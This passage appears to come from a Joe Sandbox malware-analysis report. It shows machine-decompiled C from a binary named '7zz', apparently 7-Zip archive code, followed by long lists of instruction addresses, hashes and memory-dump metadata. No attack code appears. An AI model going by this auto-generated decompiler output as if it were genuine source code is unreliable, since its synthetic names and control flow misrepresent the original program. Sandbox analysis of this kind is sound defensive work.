																	E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																	__eflags = _t786;
																	 *(_t791 - 4) = 0;
																	if(_t786 != 0) {
																		 *((intOrPtr*)( *_t786 + 8))(_t786);
																	}
																	_t790 =  *(_t791 + 0x24);
																	goto L110;
																} else {
																	__eflags =  *( *(_t791 + 0x14));
																	if( *( *(_t791 + 0x14)) != 0) {
																		_t771 =  *(_t791 - 0x5c);
																		_t714 =  *((intOrPtr*)(_t791 - 0x60));
																	} else {
																		_t771 =  *(_t791 - 0xa8);
																		_t714 =  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98);
																		asm("adc edx, [ebp-0x94]");
																		 *((intOrPtr*)(_t791 - 0x60)) = _t714;
																		 *(_t791 - 0x5c) = _t771;
																	}
																	 *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) + _t714;
																	asm("adc [eax+0x24], edx");
																	_t553 =  *((intOrPtr*)(_t786 + 0xd0));
																	 *((intOrPtr*)(_t553 + 0x28)) =  *((intOrPtr*)(_t786 + 0xe8));
																	 *((intOrPtr*)(_t553 + 0x2c)) =  *((intOrPtr*)(_t786 + 0xec));
																	_t554 =  *((intOrPtr*)(_t791 + 0x20));
																	_push( *((intOrPtr*)(_t791 - 0x30)));
																	__eflags =  *(_t554 + 4);
																	if( *(_t554 + 4) != 0) {
																		E00407A18();
																		 *(_t791 - 4) = 5;
																		E00408604(_t791 - 0x48);
																		 *(_t791 - 4) = 4;
																		L00403411(_t791 - 0xd4);
																		E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																		__eflags = _t786;
																		 *(_t791 - 4) = 0;
																		if(_t786 != 0) {
																			 *((intOrPtr*)( *_t786 + 8))(_t786);
																		}
																		_t790 = 0x80004005;
																		goto L110;
																	} else {
																		E00407A18();
																		goto L78;
																	}
																}
															} else {
																do {
																	_t563 =  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xc8)) +  *(_t791 + 0x24) * 4));
																	__eflags =  *(_t563 + 0x34);
																	if( *(_t563 + 0x34) == 0) {
																		goto L67;
																	} else {
																		_t724 =  *(_t791 + 0x1c);
																		_t565 =  *((intOrPtr*)( *_t724 + 0x1c))(_t724,  *((intOrPtr*)(_t563 + 0x30)));
																		__eflags = _t565;
																		 *(_t791 - 0x1c) = _t565;
																		if(_t565 != 0) {
																			E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																			 *(_t791 - 4) = 5;
																			E00408604(_t791 - 0x48);
																			 *(_t791 - 4) = 4;
																			L00403411(_t791 - 0xd4);
																			E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																			__eflags = _t786;
																			 *(_t791 - 4) = 0;
																			if(_t786 != 0) {
																				 *((intOrPtr*)( *_t786 + 8))(_t786);
																			}
																			_t790 =  *(_t791 - 0x1c);
																			goto L110;
																		} else {
																			goto L67;
																		}
																	}
																	goto L116;
																	L67:
																	_t539 =  *(_t791 - 0xcc);
																	 *(_t791 + 0x24) =  *(_t791 + 0x24) + 1;
																	__eflags =  *(_t791 + 0x24) - _t539;
																} while ( *(_t791 + 0x24) < _t539);
																goto L68;
															}
														} else {
															_t573 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x34))(_t791 - 0x30);
															__eflags = _t573;
															 *(_t791 + 0x24) = _t573;
															if(_t573 != 0) {
																E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																 *(_t791 - 4) = 5;
																E00408604(_t791 - 0x48);
																 *(_t791 - 4) = 4;
																L00403411(_t791 - 0xd4);
																E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																__eflags = _t786;
																 *(_t791 - 4) = 0;
																if(_t786 != 0) {
																	 *((intOrPtr*)( *_t786 + 8))(_t786);
																}
																_t790 =  *(_t791 + 0x24);
																goto L110;
															} else {
																goto L64;
															}
														}
													}
												} else {
													 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *((intOrPtr*)(_t791 - 0xac));
													_t581 =  *(_t791 + 0x1c);
													asm("adc [ebp-0x14], ecx");
													_t582 =  *((intOrPtr*)( *_t581 + 0xc))(_t581,  *(_t791 - 0x18),  *(_t791 - 0x14));
													__eflags = _t582;
													 *(_t791 + 0x24) = _t582;
													if(_t582 != 0) {
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														L00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														L110:
														 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
														E00408604(_t791 - 0xe8);
														_t468 = _t790;
														goto L82;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
							goto L116;
							L78:
							 *(_t791 - 4) = 5;
							E00408604(_t791 - 0x48);
							 *(_t791 - 4) = 4;
							L00403411(_t791 - 0xd4);
							 *(_t791 - 4) = 3;
							E00407A18( *((intOrPtr*)(_t791 - 0x70)));
							 *(_t791 - 0x20) =  *(_t791 - 0x20) + 1;
							__eflags =  *(_t791 - 0x20) -  *(_t791 - 0x24);
						} while ( *(_t791 - 0x20) <  *(_t791 - 0x24));
						goto L79;
					}
				} else {
					_t631 =  *(_t791 + 0x1c);
					_t632 =  *((intOrPtr*)( *_t631 + 0xc))(_t631,  *(_t791 - 0x18),  *(_t791 - 0x14));
					 *(_t791 + 0x24) = _t632;
					if(_t632 == 0) {
						goto L20;
					} else {
						 *(_t791 - 4) = 0;
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 =  *(_t791 + 0x24);
						L82:
						 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
						return _t468;
					}
				}
				L116:
			}



























































                                                                                                                                    0x00415d31
                                                                                                                                    0x00415d36
                                                                                                                                    0x00415d44
                                                                                                                                    0x00415d47
                                                                                                                                    0x00415d4c
                                                                                                                                    0x00415d4f
                                                                                                                                    0x00415d52
                                                                                                                                    0x00415d55
                                                                                                                                    0x00415d58
                                                                                                                                    0x00415d5b
                                                                                                                                    0x00415d65
                                                                                                                                    0x00415d68
                                                                                                                                    0x00415d6b
                                                                                                                                    0x00415d6e
                                                                                                                                    0x00415d71
                                                                                                                                    0x00415d74
                                                                                                                                    0x00415d77
                                                                                                                                    0x00415d7a
                                                                                                                                    0x00415d7d
                                                                                                                                    0x00415d82
                                                                                                                                    0x00415d8f
                                                                                                                                    0x00415d94
                                                                                                                                    0x00415d9e
                                                                                                                                    0x00415d96
                                                                                                                                    0x00415d98
                                                                                                                                    0x00415d98
                                                                                                                                    0x00415da1
                                                                                                                                    0x00415da5
                                                                                                                                    0x00415da8
                                                                                                                                    0x00415e28
                                                                                                                                    0x00415e28
                                                                                                                                    0x00415e2d
                                                                                                                                    0x00415e33
                                                                                                                                    0x00415e35
                                                                                                                                    0x00415e3a
                                                                                                                                    0x00415e3e
                                                                                                                                    0x00000000
                                                                                                                                    0x00415e40
                                                                                                                                    0x00415e40
                                                                                                                                    0x00415e45
                                                                                                                                    0x00415e45
                                                                                                                                    0x00415daa
                                                                                                                                    0x00415daa
                                                                                                                                    0x00415dad
                                                                                                                                    0x00415db5
                                                                                                                                    0x00415db9
                                                                                                                                    0x00415dbf
                                                                                                                                    0x00415dc5
                                                                                                                                    0x00415dc7
                                                                                                                                    0x00000000
                                                                                                                                    0x00415dc9
                                                                                                                                    0x00415dd8
                                                                                                                                    0x00415de1
                                                                                                                                    0x00415e52
                                                                                                                                    0x00415e59
                                                                                                                                    0x00415e5e
                                                                                                                                    0x00415e67
                                                                                                                                    0x00415e6e
                                                                                                                                    0x00415e73
                                                                                                                                    0x00415e73
                                                                                                                                    0x00415e73
                                                                                                                                    0x00415de3
                                                                                                                                    0x00415deb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415deb
                                                                                                                                    0x00415de1
                                                                                                                                    0x00000000
                                                                                                                                    0x00415ded
                                                                                                                                    0x00415dff
                                                                                                                                    0x00415e10
                                                                                                                                    0x00415e16
                                                                                                                                    0x00415e19
                                                                                                                                    0x00415e1c
                                                                                                                                    0x00415e21
                                                                                                                                    0x00415e23
                                                                                                                                    0x00000000
                                                                                                                                    0x00415daa
                                                                                                                                    0x00415e75
                                                                                                                                    0x00415e77
                                                                                                                                    0x00415e7a
                                                                                                                                    0x00415e80
                                                                                                                                    0x00415e85
                                                                                                                                    0x00415e85
                                                                                                                                    0x00415e8c
                                                                                                                                    0x00415e8f
                                                                                                                                    0x00415e99
                                                                                                                                    0x00415e9c
                                                                                                                                    0x00415ea2
                                                                                                                                    0x00415ea8
                                                                                                                                    0x00415eb0
                                                                                                                                    0x00415eb6
                                                                                                                                    0x00415eb9
                                                                                                                                    0x00415ebc
                                                                                                                                    0x00415ec2
                                                                                                                                    0x00415ec8
                                                                                                                                    0x00415ece
                                                                                                                                    0x00415ed4
                                                                                                                                    0x00415f10
                                                                                                                                    0x00415f10
                                                                                                                                    0x00415f13
                                                                                                                                    0x00415f16
                                                                                                                                    0x004163df
                                                                                                                                    0x004163e5
                                                                                                                                    0x004163e7
                                                                                                                                    0x004163f0
                                                                                                                                    0x004163f9
                                                                                                                                    0x00416402
                                                                                                                                    0x0041640b
                                                                                                                                    0x00416414
                                                                                                                                    0x0041641d
                                                                                                                                    0x00416423
                                                                                                                                    0x00416429
                                                                                                                                    0x0041642a
                                                                                                                                    0x0041642c
                                                                                                                                    0x0041642f
                                                                                                                                    0x00416438
                                                                                                                                    0x0041643e
                                                                                                                                    0x00416441
                                                                                                                                    0x00416446
                                                                                                                                    0x00416446
                                                                                                                                    0x00416449
                                                                                                                                    0x00416453
                                                                                                                                    0x00416458
                                                                                                                                    0x00416458
                                                                                                                                    0x00000000
                                                                                                                                    0x00415f1c
                                                                                                                                    0x00415f1c
                                                                                                                                    0x00415f2b
                                                                                                                                    0x00415f2e
                                                                                                                                    0x00415f36
                                                                                                                                    0x00415f3a
                                                                                                                                    0x00415f3c
                                                                                                                                    0x00415f52
                                                                                                                                    0x00415f58
                                                                                                                                    0x00415f5a
                                                                                                                                    0x00415f5f
                                                                                                                                    0x00415f61
                                                                                                                                    0x0041668a
                                                                                                                                    0x00416693
                                                                                                                                    0x0041669a
                                                                                                                                    0x004166a4
                                                                                                                                    0x004166a9
                                                                                                                                    0x004166aa
                                                                                                                                    0x004166ab
                                                                                                                                    0x004166ac
                                                                                                                                    0x004166ad
                                                                                                                                    0x004166b1
                                                                                                                                    0x004166b2
                                                                                                                                    0x004166b5
                                                                                                                                    0x004166bb
                                                                                                                                    0x004166c2
                                                                                                                                    0x004166c9
                                                                                                                                    0x004166cc
                                                                                                                                    0x004166cf
                                                                                                                                    0x004166d2
                                                                                                                                    0x004166d5
                                                                                                                                    0x004166d8
                                                                                                                                    0x004166dd
                                                                                                                                    0x004166e1
                                                                                                                                    0x004166e3
                                                                                                                                    0x004166e6
                                                                                                                                    0x004166e9
                                                                                                                                    0x004166ee
                                                                                                                                    0x004166f3
                                                                                                                                    0x004166f7
                                                                                                                                    0x004166f9
                                                                                                                                    0x004166fc
                                                                                                                                    0x004166ff
                                                                                                                                    0x00416704
                                                                                                                                    0x00416709
                                                                                                                                    0x0041670d
                                                                                                                                    0x0041670f
                                                                                                                                    0x00416712
                                                                                                                                    0x00416715
                                                                                                                                    0x0041671a
                                                                                                                                    0x0041671e
                                                                                                                                    0x00416722
                                                                                                                                    0x00416726
                                                                                                                                    0x0041672c
                                                                                                                                    0x00416732
                                                                                                                                    0x00416738
                                                                                                                                    0x0041673b
                                                                                                                                    0x0041673e
                                                                                                                                    0x00416741
                                                                                                                                    0x00416748
                                                                                                                                    0x0041674e
                                                                                                                                    0x00416754
                                                                                                                                    0x0041675a
                                                                                                                                    0x0041675c
                                                                                                                                    0x0041675e
                                                                                                                                    0x00416762
                                                                                                                                    0x00416768
                                                                                                                                    0x0041676f
                                                                                                                                    0x00416776
                                                                                                                                    0x0041677c
                                                                                                                                    0x0041677f
                                                                                                                                    0x00416781
                                                                                                                                    0x00416785
                                                                                                                                    0x00416790
                                                                                                                                    0x00416790
                                                                                                                                    0x00416787
                                                                                                                                    0x00416789
                                                                                                                                    0x00416789
                                                                                                                                    0x00416795
                                                                                                                                    0x00416799
                                                                                                                                    0x0041679f
                                                                                                                                    0x004167ac
                                                                                                                                    0x004167b4
                                                                                                                                    0x00415f67
                                                                                                                                    0x00415f6a
                                                                                                                                    0x00415f6d
                                                                                                                                    0x00415f6f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415f6f
                                                                                                                                    0x00415f3e
                                                                                                                                    0x00415f3e
                                                                                                                                    0x00415f44
                                                                                                                                    0x00415f4a
                                                                                                                                    0x00415f75
                                                                                                                                    0x00415f7a
                                                                                                                                    0x00415f88
                                                                                                                                    0x00415f8b
                                                                                                                                    0x00415f8d
                                                                                                                                    0x00415f90
                                                                                                                                    0x0041646e
                                                                                                                                    0x00416473
                                                                                                                                    0x00416476
                                                                                                                                    0x00416479
                                                                                                                                    0x0041647e
                                                                                                                                    0x0041647e
                                                                                                                                    0x00416481
                                                                                                                                    0x00000000
                                                                                                                                    0x00415f96
                                                                                                                                    0x00415f9c
                                                                                                                                    0x00415fa6
                                                                                                                                    0x00415faa
                                                                                                                                    0x00415fb2
                                                                                                                                    0x00415fb6
                                                                                                                                    0x00415fbd
                                                                                                                                    0x00415fc5
                                                                                                                                    0x00415fc8
                                                                                                                                    0x00415fcd
                                                                                                                                    0x00415fd0
                                                                                                                                    0x00415fd4
                                                                                                                                    0x00415fd7
                                                                                                                                    0x00415fdd
                                                                                                                                    0x00415fe0
                                                                                                                                    0x00415fe3
                                                                                                                                    0x00415fe5
                                                                                                                                    0x00415feb
                                                                                                                                    0x00415fed
                                                                                                                                    0x00415ff1
                                                                                                                                    0x00415ff1
                                                                                                                                    0x00415ff5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415ff7
                                                                                                                                    0x00415ff9
                                                                                                                                    0x00416008
                                                                                                                                    0x00416008
                                                                                                                                    0x00416008
                                                                                                                                    0x00415ffb
                                                                                                                                    0x00415ffc
                                                                                                                                    0x00000000
                                                                                                                                    0x00415ffc
                                                                                                                                    0x0041600c
                                                                                                                                    0x0041600c
                                                                                                                                    0x0041600f
                                                                                                                                    0x00416021
                                                                                                                                    0x0041602d
                                                                                                                                    0x00416031
                                                                                                                                    0x00416036
                                                                                                                                    0x00416038
                                                                                                                                    0x0041603b
                                                                                                                                    0x00416049
                                                                                                                                    0x0041604e
                                                                                                                                    0x00416050
                                                                                                                                    0x00416063
                                                                                                                                    0x0041606c
                                                                                                                                    0x00416070
                                                                                                                                    0x00416075
                                                                                                                                    0x0041607f
                                                                                                                                    0x00416084
                                                                                                                                    0x00416088
                                                                                                                                    0x0041608a
                                                                                                                                    0x0041608c
                                                                                                                                    0x0041608f
                                                                                                                                    0x00416093
                                                                                                                                    0x00416093
                                                                                                                                    0x00416097
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00416099
                                                                                                                                    0x0041609b
                                                                                                                                    0x004160a7
                                                                                                                                    0x004160a7
                                                                                                                                    0x0041609d
                                                                                                                                    0x0041609e
                                                                                                                                    0x00000000
                                                                                                                                    0x0041609e
                                                                                                                                    0x004160aa
                                                                                                                                    0x004160aa
                                                                                                                                    0x004160ac
                                                                                                                                    0x004160ba
                                                                                                                                    0x004160c3
                                                                                                                                    0x004160cc
                                                                                                                                    0x004160cf
                                                                                                                                    0x004160d9
                                                                                                                                    0x004160de
                                                                                                                                    0x004160e2
                                                                                                                                    0x004160ec
                                                                                                                                    0x004160f1
                                                                                                                                    0x004160f3
                                                                                                                                    0x004160fb
                                                                                                                                    0x00416106
                                                                                                                                    0x00416106
                                                                                                                                    0x004160f3
                                                                                                                                    0x004160e2
                                                                                                                                    0x00000000
                                                                                                                                    0x004160ac
                                                                                                                                    0x004160a3
                                                                                                                                    0x00000000
                                                                                                                                    0x004160a3
                                                                                                                                    0x0041608a
                                                                                                                                    0x00416050
                                                                                                                                    0x0041610b
                                                                                                                                    0x0041610e
                                                                                                                                    0x00416112
                                                                                                                                    0x00416117
                                                                                                                                    0x00000000
                                                                                                                                    0x0041600f
                                                                                                                                    0x00416003
                                                                                                                                    0x00000000
                                                                                                                                    0x00416003
                                                                                                                                    0x00415fe5
                                                                                                                                    0x00416118
                                                                                                                                    0x00416118
                                                                                                                                    0x00416124
                                                                                                                                    0x00416129
                                                                                                                                    0x0041612a
                                                                                                                                    0x0041612e
                                                                                                                                    0x0041612f
                                                                                                                                    0x00416132
                                                                                                                                    0x00416137
                                                                                                                                    0x0041613c
                                                                                                                                    0x0041613f
                                                                                                                                    0x0041648c
                                                                                                                                    0x00416490
                                                                                                                                    0x0041649b
                                                                                                                                    0x0041649f
                                                                                                                                    0x004164a7
                                                                                                                                    0x004164ac
                                                                                                                                    0x004164af
                                                                                                                                    0x004164b2
                                                                                                                                    0x004164b7
                                                                                                                                    0x004164b7
                                                                                                                                    0x004164ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00416145
                                                                                                                                    0x00416150
                                                                                                                                    0x0041615f
                                                                                                                                    0x00416167
                                                                                                                                    0x0041616a
                                                                                                                                    0x0041616c
                                                                                                                                    0x0041616f
                                                                                                                                    0x004164c7
                                                                                                                                    0x004164cb
                                                                                                                                    0x004164d6
                                                                                                                                    0x004164da
                                                                                                                                    0x004164e2
                                                                                                                                    0x004164e7
                                                                                                                                    0x004164ea
                                                                                                                                    0x004164ed
                                                                                                                                    0x004164f2
                                                                                                                                    0x004164f2
                                                                                                                                    0x004164f5
                                                                                                                                    0x00000000
                                                                                                                                    0x00416175
                                                                                                                                    0x00416175
                                                                                                                                    0x00416178
                                                                                                                                    0x00000000
                                                                                                                                    0x0041617e
                                                                                                                                    0x00416181
                                                                                                                                    0x00416183
                                                                                                                                    0x00416213
                                                                                                                                    0x00416213
                                                                                                                                    0x00416189
                                                                                                                                    0x00416189
                                                                                                                                    0x0041618f
                                                                                                                                    0x00416192
                                                                                                                                    0x00416198
                                                                                                                                    0x004161a7
                                                                                                                                    0x004161ac
                                                                                                                                    0x004161ae
                                                                                                                                    0x004161b1
                                                                                                                                    0x004161b6
                                                                                                                                    0x004161b9
                                                                                                                                    0x004161c5
                                                                                                                                    0x004161d2
                                                                                                                                    0x004161e3
                                                                                                                                    0x004161e3
                                                                                                                                    0x004161e3
                                                                                                                                    0x004161f4
                                                                                                                                    0x004161f7
                                                                                                                                    0x00416202
                                                                                                                                    0x00416202
                                                                                                                                    0x004161b9
                                                                                                                                    0x00416205
                                                                                                                                    0x0041620b
                                                                                                                                    0x0041620b
                                                                                                                                    0x00000000
                                                                                                                                    0x00416198
                                                                                                                                    0x00416192
                                                                                                                                    0x00416219
                                                                                                                                    0x00416247
                                                                                                                                    0x0041624c
                                                                                                                                    0x0041624f
                                                                                                                                    0x00416252
                                                                                                                                    0x00416255
                                                                                                                                    0x00416261
                                                                                                                                    0x00416267
                                                                                                                                    0x0041626a
                                                                                                                                    0x0041626c
                                                                                                                                    0x0041626f
                                                                                                                                    0x00416539
                                                                                                                                    0x0041653f
                                                                                                                                    0x00416546
                                                                                                                                    0x00416551
                                                                                                                                    0x00416555
                                                                                                                                    0x0041655d
                                                                                                                                    0x00416562
                                                                                                                                    0x00416565
                                                                                                                                    0x00416568
                                                                                                                                    0x0041656d
                                                                                                                                    0x0041656d
                                                                                                                                    0x00416570
                                                                                                                                    0x00000000
                                                                                                                                    0x00416275
                                                                                                                                    0x00416275
                                                                                                                                    0x00416278
                                                                                                                                    0x00416291
                                                                                                                                    0x00416291
                                                                                                                                    0x00416297
                                                                                                                                    0x0041629a
                                                                                                                                    0x0041629c
                                                                                                                                    0x004162d5
                                                                                                                                    0x004162db
                                                                                                                                    0x004162e2
                                                                                                                                    0x004162e5
                                                                                                                                    0x004162e7
                                                                                                                                    0x004162f3
                                                                                                                                    0x004162f3
                                                                                                                                    0x004162e9
                                                                                                                                    0x004162e9
                                                                                                                                    0x004162ec
                                                                                                                                    0x00000000
                                                                                                                                    0x004162ee
                                                                                                                                    0x004162ee
                                                                                                                                    0x004162f0
                                                                                                                                    0x004162f0
                                                                                                                                    0x004162ec
                                                                                                                                    0x004162f5
                                                                                                                                    0x004162fb
                                                                                                                                    0x00416301
                                                                                                                                    0x00416320
                                                                                                                                    0x00416332
                                                                                                                                    0x00416337
                                                                                                                                    0x00416339
                                                                                                                                    0x0041633c
                                                                                                                                    0x004165fc
                                                                                                                                    0x00416602
                                                                                                                                    0x00416609
                                                                                                                                    0x00416614
                                                                                                                                    0x00416618
                                                                                                                                    0x00416620
                                                                                                                                    0x00416625
                                                                                                                                    0x00416628
                                                                                                                                    0x0041662b
                                                                                                                                    0x00416630
                                                                                                                                    0x00416630
                                                                                                                                    0x00416633
                                                                                                                                    0x00000000
                                                                                                                                    0x00416342
                                                                                                                                    0x00416345
                                                                                                                                    0x00416347
                                                                                                                                    0x00416369
                                                                                                                                    0x0041636c
                                                                                                                                    0x00416349
                                                                                                                                    0x0041634f
                                                                                                                                    0x00416355
                                                                                                                                    0x0041635b
                                                                                                                                    0x00416361
                                                                                                                                    0x00416364
                                                                                                                                    0x00416364
                                                                                                                                    0x00416375
                                                                                                                                    0x00416378
                                                                                                                                    0x0041637b
                                                                                                                                    0x00416387
                                                                                                                                    0x00416390
                                                                                                                                    0x00416393
                                                                                                                                    0x00416396
                                                                                                                                    0x00416399
                                                                                                                                    0x0041639c
                                                                                                                                    0x00416638
                                                                                                                                    0x0041663e
                                                                                                                                    0x00416645
                                                                                                                                    0x00416650
                                                                                                                                    0x00416654
                                                                                                                                    0x0041665c
                                                                                                                                    0x00416661
                                                                                                                                    0x00416664
                                                                                                                                    0x00416667
                                                                                                                                    0x0041666c
                                                                                                                                    0x0041666c
                                                                                                                                    0x0041666f
                                                                                                                                    0x00000000
                                                                                                                                    0x004163a2
                                                                                                                                    0x004163a2
                                                                                                                                    0x00000000
                                                                                                                                    0x004163a7
                                                                                                                                    0x0041639c
                                                                                                                                    0x0041629e
                                                                                                                                    0x0041629e
                                                                                                                                    0x004162a7
                                                                                                                                    0x004162aa
                                                                                                                                    0x004162ad
                                                                                                                                    0x00000000
                                                                                                                                    0x004162af
                                                                                                                                    0x004162af
                                                                                                                                    0x004162b9
                                                                                                                                    0x004162bc
                                                                                                                                    0x004162be
                                                                                                                                    0x004162c1
                                                                                                                                    0x004165bd
                                                                                                                                    0x004165c3
                                                                                                                                    0x004165ca
                                                                                                                                    0x004165d5
                                                                                                                                    0x004165d9
                                                                                                                                    0x004165e1
                                                                                                                                    0x004165e6
                                                                                                                                    0x004165e9
                                                                                                                                    0x004165ec
                                                                                                                                    0x004165f1
                                                                                                                                    0x004165f1
                                                                                                                                    0x004165f4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004162c1
                                                                                                                                    0x00000000
                                                                                                                                    0x004162c7
                                                                                                                                    0x004162c7
                                                                                                                                    0x004162cd
                                                                                                                                    0x004162d0
                                                                                                                                    0x004162d0
                                                                                                                                    0x00000000
                                                                                                                                    0x0041629e
                                                                                                                                    0x0041627a
                                                                                                                                    0x00416283
                                                                                                                                    0x00416286
                                                                                                                                    0x00416288
                                                                                                                                    0x0041628b
                                                                                                                                    0x0041657b
                                                                                                                                    0x00416581
                                                                                                                                    0x00416588
                                                                                                                                    0x00416593
                                                                                                                                    0x00416597
                                                                                                                                    0x0041659f
                                                                                                                                    0x004165a4
                                                                                                                                    0x004165a7
                                                                                                                                    0x004165aa
                                                                                                                                    0x004165af
                                                                                                                                    0x004165af
                                                                                                                                    0x004165b2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041628b
                                                                                                                                    0x00416278
                                                                                                                                    0x0041621b
                                                                                                                                    0x00416227
                                                                                                                                    0x0041622a
                                                                                                                                    0x0041622d
                                                                                                                                    0x00416239
                                                                                                                                    0x0041623c
                                                                                                                                    0x0041623e
                                                                                                                                    0x00416241
                                                                                                                                    0x00416500
                                                                                                                                    0x00416504
                                                                                                                                    0x0041650f
                                                                                                                                    0x00416513
                                                                                                                                    0x0041651b
                                                                                                                                    0x00416520
                                                                                                                                    0x00416523
                                                                                                                                    0x00416526
                                                                                                                                    0x0041652b
                                                                                                                                    0x0041652b
                                                                                                                                    0x0041652e
                                                                                                                                    0x00416674
                                                                                                                                    0x00416674
                                                                                                                                    0x0041667e
                                                                                                                                    0x00416683
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00416241
                                                                                                                                    0x00416219
                                                                                                                                    0x00416178
                                                                                                                                    0x0041616f
                                                                                                                                    0x0041613f
                                                                                                                                    0x00415f90
                                                                                                                                    0x00000000
                                                                                                                                    0x004163a8
                                                                                                                                    0x004163ab
                                                                                                                                    0x004163af
                                                                                                                                    0x004163ba
                                                                                                                                    0x004163be
                                                                                                                                    0x004163c3
                                                                                                                                    0x004163ca
                                                                                                                                    0x004163cf
                                                                                                                                    0x004163d6
                                                                                                                                    0x004163d6
                                                                                                                                    0x00000000
                                                                                                                                    0x00415f1c
                                                                                                                                    0x00415ed6
                                                                                                                                    0x00415ed9
                                                                                                                                    0x00415ee2
                                                                                                                                    0x00415ee7
                                                                                                                                    0x00415eea
                                                                                                                                    0x00000000
                                                                                                                                    0x00415eec
                                                                                                                                    0x00415eee
                                                                                                                                    0x00415ef1
                                                                                                                                    0x00415ef6
                                                                                                                                    0x00415ef6
                                                                                                                                    0x00415ef9
                                                                                                                                    0x00415f03
                                                                                                                                    0x00415f08
                                                                                                                                    0x0041645a
                                                                                                                                    0x00416460
                                                                                                                                    0x00416468
                                                                                                                                    0x00416468
                                                                                                                                    0x00415eea
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00415D36
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                      • Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ExceptionRaise
                                                                                                                                    • String ID: 001$rar
                                                                                                                                    • API String ID: 2062786585-402399766
                                                                                                                                    • Opcode ID: a6f425004f4c3e1972e3301df5c6bfc4dfaa47a5e0572b03b78bf4c4b506ae6d
                                                                                                                                    • Instruction ID: 33800bdb08af1194ea128a8acb6c6cdf99de6f84a10513a4969611219b06b6dc
                                                                                                                                    • Opcode Fuzzy Hash: a6f425004f4c3e1972e3301df5c6bfc4dfaa47a5e0572b03b78bf4c4b506ae6d
                                                                                                                                    • Instruction Fuzzy Hash: B5623A70901259DFCB14DFA9C980ADDBBB1BF08308F1545AEE849B7291CB34AE85CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041035D Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
